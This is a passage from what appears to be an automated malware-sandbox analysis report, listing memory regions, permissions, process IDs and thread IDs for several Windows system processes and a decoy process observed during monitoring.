| pagefile_0x00000000012d0000 | 0x012d0000 | 0x01457fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001460000 | 0x01460000 | 0x015e0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000015f0000 | 0x015f0000 | 0x029effff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x029f0000 | 0x02d26fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000002d30000 | 0x02d30000 | 0x02daffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002db0000 | 0x02db0000 | 0x02e2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002e30000 | 0x02e30000 | 0x02eaffff | Private Memory | rw |
|
|
|
- |
| shell32.dll.mui | 0x02eb0000 | 0x02f10fff | Memory Mapped File | r |
|
|
|
- |
| kernelbase.dll.mui | 0x02f20000 | 0x02ffefff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000003000000 | 0x03000000 | 0x0307ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003080000 | 0x03080000 | 0x030fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003100000 | 0x03100000 | 0x0317ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000003180000 | 0x03180000 | 0x03181fff | Pagefile Backed Memory | r |
|
|
|
- |
| oleaccrc.dll | 0x03190000 | 0x03191fff | Memory Mapped File | r |
|
|
|
- |
| oleaccrc.dll.mui | 0x031a0000 | 0x031a4fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000031b0000 | 0x031b0000 | 0x03267fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000003270000 | 0x03270000 | 0x03273fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000003280000 | 0x03280000 | 0x0337ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003380000 | 0x03380000 | 0x0347ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003480000 | 0x03480000 | 0x03480fff | Private Memory | rw |
|
|
|
- |
| staticcache.dat | 0x03490000 | 0x044cffff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000044d0000 | 0x044d0000 | 0x044d6fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000044e0000 | 0x044e0000 | 0x044e0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000044f0000 | 0x044f0000 | 0x044f0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004500000 | 0x04500000 | 0x04500fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004510000 | 0x04510000 | 0x0458ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004590000 | 0x04590000 | 0x04591fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000045a0000 | 0x045a0000 | 0x045a0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000045b0000 | 0x045b0000 | 0x045b0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000045c0000 | 0x045c0000 | 0x045c0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000045d0000 | 0x045d0000 | 0x045d2fff | Pagefile Backed Memory | r |
|
|
|
- |
| cversions.1.db | 0x045e0000 | 0x045e3fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000045f0000 | 0x045f0000 | 0x045f0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004600000 | 0x04600000 | 0x04600fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004610000 | 0x04610000 | 0x04610fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004620000 | 0x04620000 | 0x04622fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004630000 | 0x04630000 | 0x04668fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000004670000 | 0x04670000 | 0x04672fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004680000 | 0x04680000 | 0x04680fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004690000 | 0x04690000 | 0x04690fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000046a0000 | 0x046a0000 | 0x0471ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004720000 | 0x04720000 | 0x0479ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000047a0000 | 0x047a0000 | 0x047a2fff | Pagefile Backed Memory | r |
|
|
|
- |
| cversions.2.db | 0x047b0000 | 0x047b3fff | Memory Mapped File | r |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000f.db | 0x047c0000 | 0x04802fff | Memory Mapped File | r |
|
|
|
- |
| cversions.2.db | 0x04810000 | 0x04813fff | Memory Mapped File | r |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db | 0x04820000 | 0x048aafff | Memory Mapped File | r |
|
|
|
- |
| propsys.dll.mui | 0x048b0000 | 0x048c0fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000048d0000 | 0x048d0000 | 0x0494ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004950000 | 0x04950000 | 0x049cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000049d0000 | 0x049d0000 | 0x04a4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004a50000 | 0x04a50000 | 0x04a50fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004a60000 | 0x04a60000 | 0x04adffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004ae0000 | 0x04ae0000 | 0x04b5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004b60000 | 0x04b60000 | 0x04bdffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004be0000 | 0x04be0000 | 0x050d1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000050e0000 | 0x050e0000 | 0x050e0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000005100000 | 0x05100000 | 0x05100fff | Pagefile Backed Memory | rw |
|
|
|
- |
| thumbcache_idx.db | 0x05110000 | 0x05111fff | Memory Mapped File | rw |
|
|
|
- |
| thumbcache_idx.db | 0x05120000 | 0x05121fff | Memory Mapped File | rw |
|
|
|
- |
| pagefile_0x00000000051c0000 | 0x051c0000 | 0x051c1fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000051d0000 | 0x051d0000 | 0x051d2fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000051e0000 | 0x051e0000 | 0x051e2fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000051f0000 | 0x051f0000 | 0x051f1fff | Pagefile Backed Memory | r |
|
|
|
- |
| iconcache_idx.db | 0x05210000 | 0x05211fff | Memory Mapped File | rw |
|
|
|
- |
| iconcache_idx.db | 0x05220000 | 0x05221fff | Memory Mapped File | rw |
|
|
|
- |
| thumbcache_idx.db | 0x05230000 | 0x05231fff | Memory Mapped File | rw |
|
|
|
- |
| iconcache_idx.db | 0x05240000 | 0x05241fff | Memory Mapped File | rw |
|
|
|
- |
| iconcache_256.db | 0x05250000 | 0x05250fff | Memory Mapped File | rw |
|
|
|
- |
| pagefile_0x0000000005260000 | 0x05260000 | 0x05261fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000005270000 | 0x05270000 | 0x052effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000052f0000 | 0x052f0000 | 0x0536ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005370000 | 0x05370000 | 0x053effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000053f0000 | 0x053f0000 | 0x0546ffff | Private Memory | rw |
|
|
|
- |
| winnlsres.dll | 0x05470000 | 0x05474fff | Memory Mapped File | r |
|
|
|
- |
| winnlsres.dll.mui | 0x05480000 | 0x0548ffff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000005510000 | 0x05510000 | 0x05510fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000005520000 | 0x05520000 | 0x05520fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005530000 | 0x05530000 | 0x05530fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005540000 | 0x05540000 | 0x055bffff | Private Memory | rw |
|
|
|
- |
| mswsock.dll.mui | 0x055c0000 | 0x055c2fff | Memory Mapped File | r |
|
|
|
- |
| {3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x0000000000000035.db | 0x055d0000 | 0x055ebfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000055f0000 | 0x055f0000 | 0x05deffff | Private Memory | - |
|
|
|
- |
| pagefile_0x0000000005df0000 | 0x05df0000 | 0x05df2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000005e00000 | 0x05e00000 | 0x05e00fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000005e10000 | 0x05e10000 | 0x05e12fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000005e20000 | 0x05e20000 | 0x05e20fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005e30000 | 0x05e30000 | 0x05e38fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005e40000 | 0x05e40000 | 0x05e43fff | Private Memory | rw |
|
|
|
- |
| thumbcache_idx.db | 0x05e50000 | 0x05e51fff | Memory Mapped File | rw |
|
|
|
- |
| windows.storage.dll.mui | 0x05e60000 | 0x05e67fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000005e70000 | 0x05e70000 | 0x05e78fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005e80000 | 0x05e80000 | 0x05e80fff | Private Memory | rw |
|
|
|
- |
| thumbcache_48.db | 0x05e90000 | 0x05f8ffff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000005f90000 | 0x05f90000 | 0x0608ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000006090000 | 0x06090000 | 0x06092fff | Pagefile Backed Memory | r |
|
|
|
- |
| wscui.cpl.mui | 0x060a0000 | 0x060b1fff | Memory Mapped File | r |
|
|
|
- |
| hcproviders.dll.mui | 0x060c0000 | 0x060c1fff | Memory Mapped File | r |
|
|
|
- |
| actioncenter.dll.mui | 0x060d0000 | 0x060dafff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000060f0000 | 0x060f0000 | 0x06137fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000006140000 | 0x06140000 | 0x0614ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000006150000 | 0x06150000 | 0x0615ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000006160000 | 0x06160000 | 0x0616ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| stobject.dll.mui | 0x06170000 | 0x06171fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000006180000 | 0x06180000 | 0x06182fff | Pagefile Backed Memory | r |
|
|
|
- |
| counters.dat | 0x06190000 | 0x06190fff | Memory Mapped File | rw |
|
|
|
- |
| pagefile_0x00000000061a0000 | 0x061a0000 | 0x061affff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000061b0000 | 0x061b0000 | 0x061b0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| {3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x0000000000000036.db | 0x061c0000 | 0x061dbfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000006200000 | 0x06200000 | 0x0620ffff | Private Memory | rw |
|
|
|
- |
| netmsg.dll | 0x06210000 | 0x06210fff | Memory Mapped File | r |
|
|
|
- |
| netmsg.dll.mui | 0x06220000 | 0x06251fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000006260000 | 0x06260000 | 0x062dffff | Private Memory | rw |
|
|
|
- |
| thumbcache_48.db | 0x062e0000 | 0x063dffff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000006400000 | 0x06400000 | 0x06447fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006450000 | 0x06450000 | 0x064cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000064e0000 | 0x064e0000 | 0x0655ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000006560000 | 0x06560000 | 0x06561fff | Pagefile Backed Memory | r |
|
|
|
- |
| grooveintlresource.dll | 0x06570000 | 0x06df2fff | Memory Mapped File | rwx |
|
|
|
- |
| iconcache_48.db | 0x06e00000 | 0x06efffff | Memory Mapped File | rw |
|
|
|
- |
|
For performance reasons, the remaining 330 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Process #80: runtimebroker.exe
0
0
| Information | Value |
|---|---|
| ID | #80 |
| File Name | c:\windows\system32\runtimebroker.exe |
| Command Line | C:\Windows\System32\RuntimeBroker.exe -Embedding |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:14, Reason: Child Process |
| Unmonitor | End Time: 00:03:41, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:27 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x814 |
| Parent PID | 0x248 (c:\windows\system32\svchost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
BC4
0x
BBC
0x
A08
0x
860
0x
824
0x
818
0x
96C
0x
5EC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000a7239e0000 | 0xa7239e0000 | 0xa7239effff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x000000a7239f0000 | 0xa7239f0000 | 0xa7239f6fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000a723a00000 | 0xa723a00000 | 0xa723a13fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000a723a20000 | 0xa723a20000 | 0xa723a9ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000a723aa0000 | 0xa723aa0000 | 0xa723aa3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000a723ab0000 | 0xa723ab0000 | 0xa723ab1fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000a723ac0000 | 0xa723ac0000 | 0xa723ac1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0xa723ad0000 | 0xa723b8dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000a723c10000 | 0xa723c10000 | 0xa723c10fff | Private Memory | rw |
|
|
|
- |
| private_0x000000a723c20000 | 0xa723c20000 | 0xa723c20fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000a723c30000 | 0xa723c30000 | 0xa723c30fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000a723c40000 | 0xa723c40000 | 0xa723c40fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000a723c50000 | 0xa723c50000 | 0xa723c79fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x000000a723c80000 | 0xa723c80000 | 0xa723c86fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000a723c90000 | 0xa723c90000 | 0xa723c92fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000a723ca0000 | 0xa723ca0000 | 0xa723ca0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000a723cb0000 | 0xa723cb0000 | 0xa723cb0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x000000a723cc0000 | 0xa723cc0000 | 0xa723cc6fff | Private Memory | rw |
|
|
|
- |
| private_0x000000a723d00000 | 0xa723d00000 | 0xa723dfffff | Private Memory | rw |
|
|
|
- |
| private_0x000000a723e00000 | 0xa723e00000 | 0xa723efffff | Private Memory | rw |
|
|
|
- |
| private_0x000000a723f00000 | 0xa723f00000 | 0xa723f7ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000a723f80000 | 0xa723f80000 | 0xa724107fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000a724110000 | 0xa724110000 | 0xa724290fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000a7242a0000 | 0xa7242a0000 | 0xa72569ffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0xa7256a0000 | 0xa7259d6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000a725b60000 | 0xa725b60000 | 0xa725bdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000a725c00000 | 0xa725c00000 | 0xa725cfffff | Private Memory | rw |
|
|
|
- |
| private_0x000000a725d80000 | 0xa725d80000 | 0xa725e7ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000a725e80000 | 0xa725e80000 | 0xa725efffff | Private Memory | rw |
|
|
|
- |
| private_0x000000a725f00000 | 0xa725f00000 | 0xa725f7ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007df5ffee0000 | 0x7df5ffee0000 | 0x7ff5ffedffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntoskrnl.exe | 0x7ff70c8b0000 | 0x7ff70d101fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff78dd78000 | 0x7ff78dd78000 | 0x7ff78dd79fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff78dd7a000 | 0x7ff78dd7a000 | 0x7ff78dd7bfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff78dd7e000 | 0x7ff78dd7e000 | 0x7ff78dd7ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007ff78dd80000 | 0x7ff78dd80000 | 0x7ff78de7ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff78de80000 | 0x7ff78de80000 | 0x7ff78dea2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff78dea9000 | 0x7ff78dea9000 | 0x7ff78deaafff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff78dead000 | 0x7ff78dead000 | 0x7ff78deadfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff78deae000 | 0x7ff78deae000 | 0x7ff78deaffff | Private Memory | rw |
|
|
|
- |
| runtimebroker.exe | 0x7ff78e2e0000 | 0x7ff78e2f5fff | Memory Mapped File | rwx |
|
|
|
- |
| windows.internal.shell.broker.dll | 0x7ff8db9f0000 | 0x7ff8dba81fff | Memory Mapped File | rwx |
|
|
|
- |
| execmodelclient.dll | 0x7ff8df3b0000 | 0x7ff8df3f2fff | Memory Mapped File | rwx |
|
|
|
- |
| actxprxy.dll | 0x7ff8df640000 | 0x7ff8dfaa9fff | Memory Mapped File | rwx |
|
|
|
- |
| windows.ui.immersive.dll | 0x7ff8e3a70000 | 0x7ff8e3c26fff | Memory Mapped File | rwx |
|
|
|
- |
| mrmcorer.dll | 0x7ff8e5050000 | 0x7ff8e515efff | Memory Mapped File | rwx |
|
|
|
- |
| samcli.dll | 0x7ff8e76f0000 | 0x7ff8e7707fff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x7ff8e79b0000 | 0x7ff8e7b32fff | Memory Mapped File | rwx |
|
|
|
- |
| mmdevapi.dll | 0x7ff8e7b40000 | 0x7ff8e7bb1fff | Memory Mapped File | rwx |
|
|
|
- |
| wkscli.dll | 0x7ff8e7cd0000 | 0x7ff8e7ce5fff | Memory Mapped File | rwx |
|
|
|
- |
| wtsapi32.dll | 0x7ff8e8ad0000 | 0x7ff8e8ae2fff | Memory Mapped File | rwx |
|
|
|
- |
| sppc.dll | 0x7ff8e8b60000 | 0x7ff8e8b84fff | Memory Mapped File | rwx |
|
|
|
- |
| slc.dll | 0x7ff8e8b90000 | 0x7ff8e8bb5fff | Memory Mapped File | rwx |
|
|
|
- |
| coremessaging.dll | 0x7ff8e9060000 | 0x7ff8e9127fff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x7ff8e9680000 | 0x7ff8e9715fff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x7ff8e9720000 | 0x7ff8e9746fff | Memory Mapped File | rwx |
|
|
|
- |
| netutils.dll | 0x7ff8ea000000 | 0x7ff8ea00bfff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7ff8ea270000 | 0x7ff8ea2a2fff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x7ff8ea360000 | 0x7ff8ea37efff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7ff8ea620000 | 0x7ff8ea636fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7ff8ea790000 | 0x7ff8ea79afff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x7ff8ea9d0000 | 0x7ff8ea9fbfff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x7ff8eabd0000 | 0x7ff8eabf7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x7ff8eac00000 | 0x7ff8eac6afff | Memory Mapped File | rwx |
|
|
|
- |
| sxs.dll | 0x7ff8eac70000 | 0x7ff8ead07fff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x7ff8eadd0000 | 0x7ff8eae19fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x7ff8eae20000 | 0x7ff8eae2efff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7ff8eae30000 | 0x7ff8eae42fff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x7ff8eaf60000 | 0x7ff8eafa3fff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x7ff8eb180000 | 0x7ff8eb7a7fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x7ff8eb7b0000 | 0x7ff8eb862fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ff8eb870000 | 0x7ff8eba4cfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7ff8ebb30000 | 0x7ff8ebbedfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ff8ebdc0000 | 0x7ff8ebf0dfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7ff8ec0c0000 | 0x7ff8ec21bfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ff8ec240000 | 0x7ff8ec29afff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x7ff8ec300000 | 0x7ff8ec440fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ff8ec450000 | 0x7ff8ec575fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x7ff8ec580000 | 0x7ff8edaa4fff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x7ff8edb10000 | 0x7ff8edbb4fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7ff8edbc0000 | 0x7ff8edd44fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x7ff8edd60000 | 0x7ff8edfdbfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x7ff8edfe0000 | 0x7ff8ee030fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ff8ee0b0000 | 0x7ff8ee14cfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7ff8ee150000 | 0x7ff8ee185fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7ff8ee190000 | 0x7ff8ee235fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ff8ee2d0000 | 0x7ff8ee37cfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
Process #81: shellexperiencehost.exe
0
0
| Information | Value |
|---|---|
| ID | #81 |
| File Name | c:\windows\systemapps\shellexperiencehost_cw5n1h2txyewy\shellexperiencehost.exe |
| Command Line | "C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca |
| Initial Working Directory | C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ |
| Monitor | Start Time: 00:02:14, Reason: Child Process |
| Unmonitor | End Time: 00:03:41, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:27 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x9a0 |
| Parent PID | 0x248 (c:\windows\system32\svchost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Low |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
BF0
0x
7CC
0x
7F4
0x
AB8
0x
AB4
0x
AAC
0x
AA8
0x
AA4
0x
AA0
0x
A7C
0x
A70
0x
A68
0x
A50
0x
A44
0x
A38
0x
A30
0x
A24
0x
A20
0x
A00
0x
9FC
0x
9F4
0x
9F0
0x
9EC
0x
9E8
0x
9E0
0x
9D0
0x
9CC
0x
9C0
0x
9BC
0x
9B8
0x
9B4
0x
9B0
0x
9A4
|
Process #82: searchui.exe
0
0
| Information | Value |
|---|---|
| ID | #82 |
| File Name | c:\windows\systemapps\microsoft.windows.cortana_cw5n1h2txyewy\searchui.exe |
| Command Line | "C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca |
| Initial Working Directory | C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\ |
| Monitor | Start Time: 00:02:14, Reason: Child Process |
| Unmonitor | End Time: 00:03:41, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:27 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb7c |
| Parent PID | 0x248 (c:\windows\system32\svchost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Low |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
B64
0x
AD8
0x
B4C
0x
B34
0x
AE4
0x
B30
0x
B20
0x
B3C
0x
B38
0x
AFC
0x
B04
0x
AF4
0x
B08
0x
B0C
0x
B00
0x
388
0x
BF4
0x
BE4
0x
BC8
0x
BC0
0x
BB8
0x
BB4
0x
BB0
0x
BA4
0x
BA0
0x
B9C
0x
B98
0x
B94
0x
B8C
0x
B88
0x
B84
0x
B80
|
Process #83: backgroundtaskhost.exe
0
0
| Information | Value |
|---|---|
| ID | #83 |
| File Name | c:\windows\system32\backgroundtaskhost.exe |
| Command Line | "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca |
| Initial Working Directory | C:\Windows\SystemApps\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\ |
| Monitor | Start Time: 00:02:14, Reason: Child Process |
| Unmonitor | End Time: 00:03:41, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:27 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x588 |
| Parent PID | 0x248 (c:\windows\system32\svchost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Low |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
C1C
0x
C18
0x
C14
0x
C10
0x
C0C
0x
45C
|
Process #84: uni-likely-strap.exe
0
0
| Information | Value |
|---|---|
| ID | #84 |
| File Name | c:\program files (x86)\windowspowershell\uni-likely-strap.exe |
| Command Line | "C:\Program Files (x86)\WindowsPowerShell\uni-likely-strap.exe" |
| Initial Working Directory | C:\Program Files (x86)\WindowsPowerShell\ |
| Monitor | Start Time: 00:02:14, Reason: Child Process |
| Unmonitor | End Time: 00:03:41, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:27 |
| Remark | No high level activity detected in monitored regions |
| Remark | This is a randomly generated process started by the VMRay Analyzer prior to the sample analysis. |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x738 |
| Parent PID | 0x508 (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
C90
0x
6A8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x00000000003f0000 | 0x003f0000 | 0x003fffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000400000 | 0x00400000 | 0x00403fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000410000 | 0x00410000 | 0x00410fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000420000 | 0x00420000 | 0x00433fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000440000 | 0x00440000 | 0x0047ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0057ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000580000 | 0x00580000 | 0x00583fff | Pagefile Backed Memory | r |
|
|
|
- |
